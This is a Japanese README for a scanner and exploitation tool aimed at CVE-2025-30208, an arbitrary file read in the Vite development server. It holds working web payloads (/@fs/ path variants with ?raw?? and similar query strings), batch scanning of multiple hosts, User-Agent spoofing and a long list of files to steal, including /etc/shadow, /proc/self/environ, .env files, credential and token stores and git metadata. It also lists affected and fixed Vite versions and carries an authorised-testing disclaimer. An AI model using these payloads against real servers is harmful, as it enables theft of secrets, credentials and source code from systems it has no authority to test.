
CVE‑2025‑30208 は、Vite 開発サーバー(人気のフロントエンドビルドツール)における中程度の深刻度の任意ファイル読み取り脆弱性です。
CVE-2025-30208向け高度な脆弱性スキャナー(エンタープライズグレードの機能搭載)
Vite任意ファイル読み取り脆弱性検出のためのプロフェッショナルペネトレーションテストツール
🚀 クイックスタート • 📋 機能 • 🔧 使用方法 • 📊 例 • 🛡️ セキュリティ
これは、Vite開発サーバーの CVE-2025-30208 脆弱性を検出・悪用するために設計された総合的な脆弱性スキャナーです。この脆弱性により、Viteのファイルシステムエンドポイントを介して任意のファイルが読み取り可能となり、機密性の高い設定ファイル、ソースコード、システム情報が露出する可能性があります。
このツールは、保守性と拡張性を高めるために モジュラーアーキテクチャ を採用しています。
CVE-2025-30208.py - メインスキャナーアプリケーションpayloads.py - 高度な悪用ペイロード(60種類以上)sensitive_files.py - 包括的な機密ファイルデータベース(200ファイル以上)html_template.py - 強化されたハッカースタイルHTMLレポートテンプレートpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# 詳細出力のために冗長モードを有効化
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
CVE-2025-30208 > scan
# プロキシ設定
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# カスタムヘッダー設定
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# レート制限設定
CVE-2025-30208 > rate
Enter rate limit: 1.0
# 美しいHTMLレポートを生成
CVE-2025-30208 > pull
# レポート表示用のWebサーバー起動
CVE-2025-30208 > web
# 特定のポートでWebサーバー起動
CVE-2025-30208 > web 8081
# Webサーバー停止
CVE-2025-30208 > web off
このスキャナーは現在、payloads.py に 60種類以上のペイロードバリエーション を使用しています。
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
このツールは現在、sensitive_files.py で 200以上の機密ファイル をテストします。
/etc/passwd - ユーザーアカウント情報/etc/shadow - 暗号化されたパスワードデータ/etc/services - ネットワークサービス/etc/hosts - ホスト名マッピング/etc/fstab - ファイルシステムテーブル/etc/ssh/sshd_config - SSHサーバー設定/etc/crontab - システムcronジョブ/etc/sudoers - sudo設定/proc/version - カーネルバージョン/proc/cpuinfo - CPU情報/proc/meminfo - メモリ情報/proc/self/environ - プロセス環境変数/proc/self/cmdline - プロセスコマンドライン/proc/net/tcp - TCP接続/proc/net/udp - UDP接続.env - 環境変数.env.local - ローカル環境.env.production - 本番環境config.json - アプリケーション設定settings.json - アプリケーション設定application.properties - Spring設定application.yml - YAML設定database.yml - データベース設定secrets.json - シークレット管理package.json - Node.js依存関係package-lock.json - ロックされた依存関係yarn.lock - Yarnロックファイルvite.config.js - Vite設定vite.config.ts - TypeScript Vite設定tsconfig.json - TypeScript設定webpack.config.js - Webpack設定next.config.js - Next.js設定nuxt.config.js - Nuxt.js設定angular.json - Angular設定vue.config.js - Vue.js設定rollup.config.js - Rollup設定eslint.config.js - ESLint設定.git/config - Git設定.gitignore - Git無視ルール.gitattributes - Git属性.gitmodules - Gitサブモジュール.git/HEAD - 現在のブランチ.git/logs/HEAD - Gitログ.git/refs/heads/master - masterブランチ.git/refs/heads/main - mainブランチREADME.md - プロジェクトドキュメントCHANGELOG.md - 変更履歴LICENSE - ライセンス情報CONTRIBUTING.md - コントリビューションガイドラインAUTHORS - 作成者情報TODO.md - TODOリストROADMAP.md - 開発ロードマップDockerfile - Docker設定docker-compose.yml - Docker Composedocker-compose.override.yml - オーバーライド設定.dockerignore - Docker無視ルールdocker-compose.prod.yml - 本番設定docker-compose.dev.yml - 開発設定nginx.conf - Nginx設定apache2.conf - Apache設定httpd.conf - HTTPデーモン設定.htaccess - Apacheアクセス制御web.config - IIS設定robots.txt - 検索エンジン指示sitemap.xml - サイト構造manifest.json - Webアプリマニフェストsw.js - サービスワーカーfirebase.json - Firebase設定firebase.rules - Firebaseセキュリティルールboot.ini - ブート設定autoexec.bat - 自動実行スクリプトsystem.ini - システム設定win.ini - Windows設定Users - ユーザーディレクトリWindows - システムファイルProgram Files - アプリケーションディレクトリSystem - システムファイルLibrary - ライブラリファイルApplications - アプリケーションファイルprivate/etc/hosts - hostsファイルprivate/etc/passwd - ユーザーアカウントdatabase.db - SQLiteデータベースdatabase.sqlite - SQLiteデータベースdata.db - データデータベースdump.sql - データベースダンプschema.sql - データベーススキーマmigrations - データベースマイグレーションlogs - ログディレクトリerror.log - エラーログaccess.log - アクセスログapp.log - アプリケーションログdebug.log - デバッグログcombined.log - 結合ログbackup - バックアップディレクトリbackup.sql - データベースバックアップbackup.zip - 圧縮バックアップdump - データダンプexport - データエクスポートauth.json - 認証設定credentials.json - 資格情報保存keys.json - キー管理tokens.json - トークン保存jwt.json - JWT設定oauth.json - OAuth設定api.json - API設定swagger.json - APIドキュメントopenapi.json - OpenAPI仕様graphql.json - GraphQL設定schema.json - APIスキーマcloudformation.yml - AWS CloudFormationserverless.yml - Serverless設定terraform.tf - Terraform設定kubernetes.yml - Kubernetes設定k8s.yml - Kubernetes設定analytics.json - 分析設定monitoring.json - 監視設定metrics.json - メトリクス設定telemetry.json - テレメトリデータこのツールは現在、美しいハッカースタイルのHTMLレポート を生成します。
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # メインスキャナーアプリケーション
├── payloads.py # 高度な悪用ペイロード(60以上)
├── sensitive_files.py # 機密ファイルデータベース(200以上)
├── html_template.py # 強化されたHTMLレポートテンプレート
├── README.md # このドキュメント
├── requirements.txt # Python依存関係
├── logs/ # ログファイルディレクトリ
├── data_leak.html # 生成されたHTMLレポート
├── data_leak.json # 生成されたJSONレポート
└── session.json # 保存されたセッション設定
このツールの改善のためのコントリビュートを歓迎します。
payloads.py への新しいペイロードバリエーションsensitive_files.py への追加の機密ファイルパターンhtml_template.py への強化されたHTMLテンプレートこのプロジェクトは、教育目的および許可されたセキュリティテスト目的のみ にライセンスされています。
⚠️ 法的免責事項:このツールは、許可されたセキュリティテストおよび研究目的のみを対象としています。ユーザーは、システムをテストする前に適切な許可を得ていることを確認する責任があります。作者は、このツールの誤用について一切の責任を負いません。
⭐ このツールが役に立ったなら、スターをお願いします! ⭐
セキュリティコミュニティのために ❤️ を込めて作られました
| コマンド | 説明 | 例 |
|---|
set <option> <value> | 設定オプションの設定 | set RHOST 192.168.1.100 |
show options | 現在の設定の表示 | show options |
edit | 対話型オプションエディター | edit |
run / exploit | 脆弱性テストの実行 | run |
batch | 複数ターゲットのバッチスキャン | batch |
scan | 機密ファイルの発見 | scan |
pull | 結果をHTML/JSONにエクスポート | pull |
web [on|off|port] | HTMLレポート用Webサーバー | web 8080 |
save | セッション設定の保存 | save |
load | セッション設定の読み込み | load |
test | ターゲットへの接続テスト | test |
validate | 現在の設定の検証 | validate |
verbose | 冗長モードの切り替え | verbose |
proxy | プロキシ設定の構成 | proxy |
rate | レート制限の設定 | rate |
log | ログ情報の表示 | log |
help / ? | ヘルプの表示 | help |
exit / quit | ツールの終了 | exit |
| オプション | 説明 | デフォルト | 検証 |
|---|
RHOST | ターゲットホスト/IPアドレス | - | ホスト名/IP検証 |
RPORT | ターゲットポート番号 | - | ポート範囲 (1-65535) |
FILEPATH | テストするファイルパス | etc/passwd | パス検証 |
PROXY | HTTP/HTTPSプロキシURL | - | URL形式検証 |
VERBOSE | 冗長出力の有効化 | false | 真偽値検証 |
RATE_LIMIT | リクエスト間の遅延(秒) | 0.3 | 数値検証 |
THREADS | バッチスキャンのスレッド数 | 5 | 整数検証 |
TIMEOUT | リクエストタイムアウト(秒) | 5 | 整数検証 |
CUSTOM_HEADERS | カスタムHTTPヘッダー (JSON) | {} | JSON形式検証 |
prettier.config.js - Prettier設定jest.config.js - Jest設定babel.config.js - Babel設定tailwind.config.js - Tailwind CSS設定| ファイル | 説明 | 形式 |
|---|
data_leak.html | 強化されたハッカースタイルHTML脆弱性レポート | HTML |
data_leak.json | 構造化JSONエクスポート | JSON |
sensitive_files_discovery.json | 発見された機密ファイル | JSON |
session.json | 保存されたセッション設定 | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | 詳細な監査ログ | テキスト |